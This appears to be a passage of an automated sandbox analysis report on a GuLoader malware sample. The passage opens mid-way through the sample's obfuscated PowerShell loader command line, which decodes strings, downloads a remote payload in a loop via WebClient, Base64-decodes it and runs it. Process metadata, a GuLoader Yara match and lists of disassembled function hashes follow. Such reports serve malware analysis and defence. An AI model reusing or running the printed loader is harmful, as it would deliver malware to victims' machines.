SrTei,fvSkeS .GigL,o.iohygAxlTueB,. DcReo CmEr/FiuP.c i?BeeAnxa.pSkoA,rVet I=BidP oCaw.in OlS.o qaOvdTr&LoiMad M=Ko1 ey S-UnsBorArWMey t9P.W sPaTBox EODe0SeaA.cUs2 FNJiV agAn8 JA ,2,ea .U .mEonBiTRi3BeVSgqunyJ CP ';$Unhomologic=Trosfllen ' >Te ';$Impotens=Trosfllen 'PeiUneStxUm ';$Aarigt='Traadrullerne';$Databasemodellerne = Trosfllen 'B eTrcK.h,noMy K%U.a YpT pKvdChaHatBraUl% S\ oD,vesim,eo,rcL.r.iaRetKniEasOliStnDigNo. IS ppb.iCo W,&Bj&Ki E.eUncX h .oFo At H ';Extensionalism (Trosfllen ' S$,ngH,lVioKubSoa lM : bGrit.gRatCrhG.aGetu.c ah.r=.h(ZacFlm KdJ, Pa/ eceu E.$AnDBraTet ,aSnb Aa FsKle AmR oEld.eeOrlL,l,keA rMonFoeHe)lu ');Extensionalism (Trosfllen 'Ki$R gOsl aoPrbS aTul.r:K.MT.a,tlSylUneAuo TlSkaFarS,= ,$MelS oN v er ,e rg .l eeT nC,sJr.mis ,pScl PiFot V( S$MeUErn Ch .oAdmUroTel.koH,g,biFlcdi)co ');Extensionalism (Trosfllen ' P[B.NHaeT,t .. .S .eFerB,vFoi.tcNoeT,POvoLiiChnSltBiMRea Kn DaOkg.ieSarC,] .:.i:DiSKleSpcSeu irSliIntUny.iP Cr.eo ,t So fcF,o lTe .l=Bu Se[ NBeeFutAl.BeSAteSocfruMar OiElt ay.oP Kr.noSutVeoSacKioCol UT fy.ip.eeGa]Ls: o:S.TPalDosMo1ps2 , ');$lovreglens=$Malleolar[0];$Fjedrene= (Trosfllen ' o$.lgKul.eoEtbD.aSilA.:esAFonD,i PsDee.liNdkMyo intriF.cGu= ,N Pe.aw H-AfOjebToj keFocP.t , DeSSpy esSntheeBimUl.,dN ReS.tRe.LuWspePrbSpC ,lE,iFoen nV t');$Fjedrene+=$bigthatch[1];Extensionalism ($Fjedrene);Extensionalism (Trosfllen 'do$UhA,rnFiidesBeePriFrkVroStnsai .cIr.LeHDue ,aGidAte,orImsBu[Eu$StP SrDeeTuaSysBosDiuPrr Di TnR gSo]Cr=S $SuCStzRha,mrJod fa.esVa ');$Padleaare=Trosfllen 'Lu$A,Abint,ipasspeGni PkTeom,nq.iUnc,r.FoDNooCuwStnIml.ao,aa,wdKaF iU l ie .( .$ AlS.oUnv .rT.e egCll,ae OnBesBu,Ta$TuW .i .n ,dCaoI.wSustrhDeoB.p.op iKonEpgPr)Ko ';$Windowshopping=$bigthatch[0];Extensionalism (Trosfllen 'S $Cog AlFuo.obTaaP.lEn: yG nyAtm ,n aa fs.tt ke .rFonAfe,tsH,= O( RTA eGasHotNo-A.PV,aArt ,hOc o$FoWH.iS,nGadMeo SwPrsSvhTeo,ppExpU.iSlnOpgOm)Ac ');while (!$Gymnasternes) {Extensionalism (Trosfllen ' n$ hgT lbooSub,uaJolFl:PeS SkMeo ,l ieLes ,kO,eCamSuaVasIn= U$OutfirBluPreCa ') ;Extensionalism $Padleaare;Extensionalism (Trosfllen '.aS Tt.haStrDit.a-AdSUnl HeEke,lplk Ki4 H ');Extensionalism (Trosfllen 'E,$OvgT l aoS.b PaPolKo:siGAny mD,nTaaLysR,t ae r NnS,eShsRi=.e(M TExeStsU.tI,-AnPMaa ntCahNo go$PaWR,irenS.dDeoaswSvs AhProR,p ip.ii InHegBe)T ') ;Extensionalism (Trosfllen 'W,$T,g .lM,oChbfoa.alT :K.O tr trehgloFldFriCoa gBer aPrpO,hS.y o2Ru1 .7Fo= l$ ,g,yl MoDebPra SlT,:C HP eOvm TilitDeeJar uaNdtGaiDrcJ,+Pa+Be%Re$.iMHyaPolYmlMaef.o nlR a SrTr.Rac ,oHuuOtnBetEn ') ;$lovreglens=$Malleolar[$Orthodiagraphy217];}$Firetogs123=301889;$Stjrthagerne=26396;Extensionalism (Trosfllen 'P $AcgSllTio.nbGta rl,o:EnNVaoM n.esVkcE aV lBaaSerRe G.=Mi BG.ceIntSc-S.CA oS.nPrtCae CnAnt U Pa$NaW.oi,lnNudB oApwIns,nh Fo Jp Bp PiS,nReg.a ');Extensionalism (Trosfllen ',r$HogSnlOboWabBuaHelS,:DiG.uaTrl GlB u .paat,aaD.lSel Ae en SeSns n2 p9La D.=R A[ oSReyTisfrt ieCom .L.CDeo.onF.vnie.nrOvtG,]Be: D: TF Dr MoNom LBA,a osBue E6Mn4,eSS t .rH iRonB g (a $ ,N,yoRanTesPecPoaOrlCha srTr)Ly ');Extensionalism (Trosfllen 'Oc$Prg ,lAloP.b.iaFel V:P AS.bN.eRitHo2Un2 .6Ut F.=Th St[KoS ByC,sCatUne m .roTBle.hxDet K.PrEa.nSkcApoFedS iP.nlig .] r: A:FoA.rSSkCBeIC,IT,.jaG ReR,tInS Otter FiMenArgS (,e$ KGDiaKol.olFsuInpF t NaF l.gl le ,nB.eklsN,2 S9Ci).n ');Extensionalism (Trosfllen 'Li$,sgKol,eodobUla ,l.f:,aUHnnIns Ww FeErlg,tNoe vr.diStnCig,a=A $unA MbO e.pt.l2 a2Op6,i.AfsPauArb Ns MtKorKoiUdnRegBe(Pe$AiFUniDir de ,tS o,ng,asR.1Ko2Gr3Fe, T$CoSP,t BjDerF,t,lhA,aKag ae Lr.rnTie S)Cr ');Extensionalism $Unsweltering;"
            Imagebase:0x7ff70f330000
            File size:433'152 bytes
            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2973558788.000000000607A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:high
            Has exited:false

            General

            Target ID:10
            Start time:02:52:23
            Start date:03/07/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Democratising.Spi && echo t"
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Executed Functions

              Function 00007FFD9B885C6C Relevance: .5, Instructions: 529COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9d050bd8b8396799979d81682a196ed17994bf91db21a9dcdfd324bde9ef569a
              • Instruction ID: 865637b7a4e2c36ad89250fa54efe91b7bd31ef60ea03bb576b91ca9593e5487
              • Opcode Fuzzy Hash: 9d050bd8b8396799979d81682a196ed17994bf91db21a9dcdfd324bde9ef569a
              • Instruction Fuzzy Hash: 63F1D230A09A4D8FDF98DF5CC4A5AE977F1FF58300F1541AAD419D72A6CA34E842CB81
              Function 00007FFD9B956609 Relevance: .5, Instructions: 467COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a715bb7dfb1534531b462678ce5f7ddcc5a4d4d4662531cd43a9d7830fe8cc4b
              • Instruction ID: e7394d308b7eed9fe42eae82393287e1bbb2fa6a2498a9118eae75612a07d0bf
              • Opcode Fuzzy Hash: a715bb7dfb1534531b462678ce5f7ddcc5a4d4d4662531cd43a9d7830fe8cc4b
              • Instruction Fuzzy Hash: 48E15A31B1EB8E5FEBA5DBA888745B47BE1EF55320F1901BAD85DC71E3CE18A8058301
              Function 00007FFD9B957625 Relevance: .4, Instructions: 433COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32f4a866f57e051ab5541c2ca7c4d84cff7ff61d37d6b74861e75258b1abb45c
              • Instruction ID: 20b096bd296b4afa89ddc18ee23fcc004b38d7ff682ece110f8d6703459d62ac
              • Opcode Fuzzy Hash: 32f4a866f57e051ab5541c2ca7c4d84cff7ff61d37d6b74861e75258b1abb45c
              • Instruction Fuzzy Hash: C8D15622B1FA8E1FEBA69BAC58645B47BD1EF55210B0900FBD85CC71E3DD58AE05C342
              Function 00007FFD9B88B743 Relevance: .2, Instructions: 200COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ff79e0aacc16f4ba62618216db0159cd6dad5822b379b3d6c7f6dc1f95629814
              • Instruction ID: 49d182f8f928b4374b34cd6bfbe3d6aad9c16daaac8990660d497ac4d57be3e3
              • Opcode Fuzzy Hash: ff79e0aacc16f4ba62618216db0159cd6dad5822b379b3d6c7f6dc1f95629814
              • Instruction Fuzzy Hash: 5A61C730608B4D8FDBA8DF28D8557E977E1FF98310F00426EE85DC7295CB3899458B82
              Function 00007FFD9B9567A7 Relevance: .2, Instructions: 150COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 48200bc1c8f0e7d9b37304d73aafe6a3e66f9560974a53956e324e3c5b51c75e
              • Instruction ID: d186779f90ab726fad6179717771f223d42ee439f7fe210b36fd8870e7a7ef74
              • Opcode Fuzzy Hash: 48200bc1c8f0e7d9b37304d73aafe6a3e66f9560974a53956e324e3c5b51c75e
              • Instruction Fuzzy Hash: 3D411522B6FACA1FE7A5D7A854705B867D1EF55320B1900BAD96CC72E3DE19AC048301
              Function 00007FFD9B957822 Relevance: .1, Instructions: 108COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3022315199.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b950000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 65557f9ed69c0ccf0770600277301b00ef7eecf6c443e0520f2a3acbbccbfce1
              • Instruction ID: 29d3f68a3cb877b385ed79dd7643a1dc062d344ef7164f3f542c3d5d61a9aeeb
              • Opcode Fuzzy Hash: 65557f9ed69c0ccf0770600277301b00ef7eecf6c443e0520f2a3acbbccbfce1
              • Instruction Fuzzy Hash: 1D31E522F6FADA1BE7B697E818B15B86781EF50354B1901BAD95DC31E3DD4C6E008342
              Function 00007FFD9B88C5E6 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ecf7152bfeced514bb755f982f8ba397fc8d54ecd097a8e2a86dafadc306109
              • Instruction ID: 0c7b349e9872953938260dd3441ca79921a2b9ad243a50174e259784d725549c
              • Opcode Fuzzy Hash: 1ecf7152bfeced514bb755f982f8ba397fc8d54ecd097a8e2a86dafadc306109
              • Instruction Fuzzy Hash: 89312A30518B8C8FEBA9DF28C855BD97BE1FB98310F14426EE84DC7255CB78A545CB81
              Function 00007FFD9B88C5A4 Relevance: .1, Instructions: 78COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3001959b665709d3ae1ef23cb84911a791e456f7cd23c21257915d77ddb64c55
              • Instruction ID: 218d7cb58e0795eab0b93d732922e7380cc1fd602800bac02ad9bd01b2332ff3
              • Opcode Fuzzy Hash: 3001959b665709d3ae1ef23cb84911a791e456f7cd23c21257915d77ddb64c55
              • Instruction Fuzzy Hash: F4311C70518B8C8FDBA8DF18C895BD97BE1FF98310F54426AE84DC7256CB74A544CB81
              Function 00007FFD9B883535 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000005.00000002.3021697744.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_7ffd9b880000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
              • Instruction ID: 1fa9c4b6de25af3c09eeda563ddac642f27ce745a1e9786955744c945ca2b0d9
              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
              • Instruction Fuzzy Hash: 2A01A77020CB0C4FD748EF0CE451AA5B3E0FB89320F10056DE58AC36A1DA32E881CB41

              Executed Functions

              Function 04C0F1F0 Relevance: .3, Instructions: 281COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e544bf6ebdd3a3b75838c6c8c18c4a9258ef582b7de1fc147d500f8df482a2a
              • Instruction ID: aff458c76caf03ff04bf06a3aa47a0b5c7ff68d31b657ad7d6d6770870ee9a26
              • Opcode Fuzzy Hash: 2e544bf6ebdd3a3b75838c6c8c18c4a9258ef582b7de1fc147d500f8df482a2a
              • Instruction Fuzzy Hash: 2BB15270E00209DFDF24CFA9D9857ADBBF2AF88314F14C52DD815A7294EB74A985CB81
              Function 04C0FAC0 Relevance: .3, Instructions: 266COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 88fc7db1312753aba3547d5da9ba8bad6ec2e1558b3b4a3bc94475a011605d49
              • Instruction ID: 693b2db50f17b85e2f6d0aec8f605ced7d753f7e1e9b94d2a25f7b3df5062daf
              • Opcode Fuzzy Hash: 88fc7db1312753aba3547d5da9ba8bad6ec2e1558b3b4a3bc94475a011605d49
              • Instruction Fuzzy Hash: 50B14D70E00209CFDF24CFA9D89579DBBF2AF88354F14C52DD815A7294EBB4A985CB81
              Function 079D3D38 Relevance: 15.5, Strings: 12, Instructions: 494COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-879563280
              • Opcode ID: 9647aea31bd28ee1a64fda00b9c2055382e7f812224c7283557fa4e67823c604
              • Instruction ID: 195d5b18163264863575d8cddd2c286c6c3d8512ea42c5b8d6e32521c677bcc7
              • Opcode Fuzzy Hash: 9647aea31bd28ee1a64fda00b9c2055382e7f812224c7283557fa4e67823c604
              • Instruction Fuzzy Hash: 14F15BB1B04386DFCB158B39C81066ABBF5AF86215F18C4ABD845CF2A6DB31CC45C762
              Function 079D25A8 Relevance: 13.4, Strings: 10, Instructions: 881COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
              • API String ID: 0-788909730
              • Opcode ID: 45de21c76c2af9ec9f839a9cec21612f437ff28d25962e4fa49e4926f0dd9da6
              • Instruction ID: 954434bd426156bdc75dc9c1c8dd873a5bcfcd955dcc3bc1cdfd81cb1d639ffb
              • Opcode Fuzzy Hash: 45de21c76c2af9ec9f839a9cec21612f437ff28d25962e4fa49e4926f0dd9da6
              • Instruction Fuzzy Hash: 4D62BFB4B00205DFCB14CBA8C550AAEBBB6BF89318F14C4AAD8159F355DB72DC45CBA1
              Function 079D88D0 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
              • API String ID: 0-2822668367
              • Opcode ID: 3cb7fbbabc50570de17faf160757cc83b4088cd49783385864b9b6d974fccb7f
              • Instruction ID: ca9d261303b6ab95c0a242c254b80c8e533237d5fe77bdb41a3ece250b9a5e57
              • Opcode Fuzzy Hash: 3cb7fbbabc50570de17faf160757cc83b4088cd49783385864b9b6d974fccb7f
              • Instruction Fuzzy Hash: 27D19FB0B402089FCB18DF68C555FAEBBB6AB88308F10C469D4116F796CB76EC45CB91
              Function 079D763D Relevance: 7.8, Strings: 6, Instructions: 312COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
              • API String ID: 0-2822668367
              • Opcode ID: 58f0a1068893bd89e553e8d0ae9b2ea48e35c55ff435e5cd1952f413cd0f72fa
              • Instruction ID: 1b197d7944f3ad6ee32342ffa17ead75612bf5322b42d250423ee420d958d4e2
              • Opcode Fuzzy Hash: 58f0a1068893bd89e553e8d0ae9b2ea48e35c55ff435e5cd1952f413cd0f72fa
              • Instruction Fuzzy Hash: FFD1A4B0A002188FD714DF98C951F9EBBB6BB84308F50C499D5096F395CB72ED858F91
              Function 04C0BB00 Relevance: 4.3, Strings: 3, Instructions: 513COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: Hbq$$^q$$^q
              • API String ID: 0-1611274095
              • Opcode ID: f4cafe74046336644626eeb8ad701c655b2a6c1f44819d67566f1b638f16f483
              • Instruction ID: 32a45a94971abd465e799b964659673456058b4b2db029e800196582fe51927f
              • Opcode Fuzzy Hash: f4cafe74046336644626eeb8ad701c655b2a6c1f44819d67566f1b638f16f483
              • Instruction Fuzzy Hash: 86228334B012148FDB29DF25C9546AEB7B2EF89304F1585A9D40AAB391DF35EE81CF81
              Function 079D88B0 Relevance: 4.0, Strings: 3, Instructions: 265COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q
              • API String ID: 0-1196845430
              • Opcode ID: e4c76b7f39908703c88953259237073613a5de22f50a10745ab081056a26d7c8
              • Instruction ID: 26a9ca3e2c6b2b64e4f56d280b7d2897ac01bc18c6b3e45fc159e26a2d58a1ee
              • Opcode Fuzzy Hash: e4c76b7f39908703c88953259237073613a5de22f50a10745ab081056a26d7c8
              • Instruction Fuzzy Hash: 58B18BB0A01204DFCB18CF68C555FAEBBB2AB88308F15C459D8556F396CB76EC46CB91
              Function 079D6408 Relevance: 3.3, Strings: 2, Instructions: 833COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q
              • API String ID: 0-2697143702
              • Opcode ID: 1261434be4332f2f66583418aec321ec4415123c44f84c0f777ad01fd9f5ed5d
              • Instruction ID: 3dc1cd6c4c4dd1ef5f721bcfd4d4403d2ca1b90329b48623a02cad9fd0ccef62
              • Opcode Fuzzy Hash: 1261434be4332f2f66583418aec321ec4415123c44f84c0f777ad01fd9f5ed5d
              • Instruction Fuzzy Hash: 89725CB4B00208CFD714CB98C945B59BBB2BF89358F14C469E919AF395CB76EC45CB81
              Function 079D7AC3 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q
              • API String ID: 0-2697143702
              • Opcode ID: 267f14e59bd115f4cfeb2750ac6ed85bd3ad6b20dc5aaa9dd4c983bba56944b1
              • Instruction ID: 9889fc4370339d39520ca82c09d753652a1cd4c82be28de807fb9d99e0112e21
              • Opcode Fuzzy Hash: 267f14e59bd115f4cfeb2750ac6ed85bd3ad6b20dc5aaa9dd4c983bba56944b1
              • Instruction Fuzzy Hash: 46F1C4B0A002189FD724DB58CD50FAEBBB6BB84304F50C4E9D9096F795CB72ED858B91
              Function 079D63EB Relevance: 1.9, Strings: 1, Instructions: 646COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q
              • API String ID: 0-1614139903
              • Opcode ID: a069c24eb32661230955f1d89a999403edc4558d23b833062ae9c1bc4104d678
              • Instruction ID: 01e327cab752d85f7745c261463f2cb6ccdbb95f4b92bf271e34967ca19d80b0
              • Opcode Fuzzy Hash: a069c24eb32661230955f1d89a999403edc4558d23b833062ae9c1bc4104d678
              • Instruction Fuzzy Hash: 71525BB4A00205DFDB14CB58C945B99BBB2FF89358F14C0A9E919AF395CB76EC41CB81
              Function 079D44EC Relevance: 1.4, Strings: 1, Instructions: 109COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: tP^q
              • API String ID: 0-2862610199
              • Opcode ID: 6a05e8ab2e123886c9a4518ed3a2575ccfb95cd3ebe05ae6d893c7cba2dcbc60
              • Instruction ID: e3f30b7aa43f41f2f5c9e29309457beb29912f71fb8a21262c0620f277f6fca8
              • Opcode Fuzzy Hash: 6a05e8ab2e123886c9a4518ed3a2575ccfb95cd3ebe05ae6d893c7cba2dcbc60
              • Instruction Fuzzy Hash: 0B4119B0A093D19FCB128FA4C814765BFB1AF46214F19C4DBDD459F2A3C6319C4ACB92
              Function 04C045A8 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: W
              • API String ID: 0-655174618
              • Opcode ID: d92db0ff025b82e295fb24d29897fdd480fb8cc9bd74362dcbefa3e04d407e8e
              • Instruction ID: 562678a35aa1ba9ecea87890650e07b97fe9b081849f70ddac236267ca949e88
              • Opcode Fuzzy Hash: d92db0ff025b82e295fb24d29897fdd480fb8cc9bd74362dcbefa3e04d407e8e
              • Instruction Fuzzy Hash: CE21E3B4A0021ADFCB04DF58C5909AAFBB2FF49310B158599E909EB761C735EC91CFA0
              Function 079D6CF1 Relevance: .5, Instructions: 459COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 24d217f392d0c71ee50caa4fed6e26f029fb6fef4739f4bca3276fcd61f528f8
              • Instruction ID: 0e8340b297b787c04dbe90b0daf1d87a92fb77eb79e3d730a230e94c5867dad8
              • Opcode Fuzzy Hash: 24d217f392d0c71ee50caa4fed6e26f029fb6fef4739f4bca3276fcd61f528f8
              • Instruction Fuzzy Hash: 39125BB4A10205DFD714CB98C941F59BBB2FB89358F14C0A9E919AF391CB76EC41CB81
              Function 079D2A4B Relevance: .4, Instructions: 409COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b5b91cda1b369bd580673b9b6233e2ad883134f5e65d240988ba020971d47f10
              • Instruction ID: 35b8eff678eaac777385583d4616daa371e68a80d33447e1631d4a3f8d29d814
              • Opcode Fuzzy Hash: b5b91cda1b369bd580673b9b6233e2ad883134f5e65d240988ba020971d47f10
              • Instruction Fuzzy Hash: 0FF149B4A00205EFDB14CF98D541FA9BBB6FB89318F14C4A9E805AB795C672EC41CB91
              Function 079D259F Relevance: .4, Instructions: 376COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 681d8d09044e9918ceb55c9252cd8e56b7ed4ae70e306112526a295a9865f5ea
              • Instruction ID: dea3432ad5d18bce0f13980a7409fcd9c62b953aa84f7c4a0785c7b0713bfc29
              • Opcode Fuzzy Hash: 681d8d09044e9918ceb55c9252cd8e56b7ed4ae70e306112526a295a9865f5ea
              • Instruction Fuzzy Hash: 97F115B4A00205DFDB14CB98C595EADBBB6FB88318F14C4A9D819AB755C772EC42CF90
              Function 04C04EA8 Relevance: .3, Instructions: 330COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a86f18c63cd1f37c5857e66300e7ac354ca3d10aa2f8a02f9ba60155a696a794
              • Instruction ID: 0012a45b843f4afb75f1572170e9b3784e129fbda671211b6b735e2cd906b2e6
              • Opcode Fuzzy Hash: a86f18c63cd1f37c5857e66300e7ac354ca3d10aa2f8a02f9ba60155a696a794
              • Instruction Fuzzy Hash: 9DD10A74A00218AFDB15CFA8D584AADBBB2FF48314F25C155E805AB3A5D735ED82CF90
              Function 04C045B8 Relevance: .3, Instructions: 317COMMON
              Download Yara Rule
              Memory Dump Source
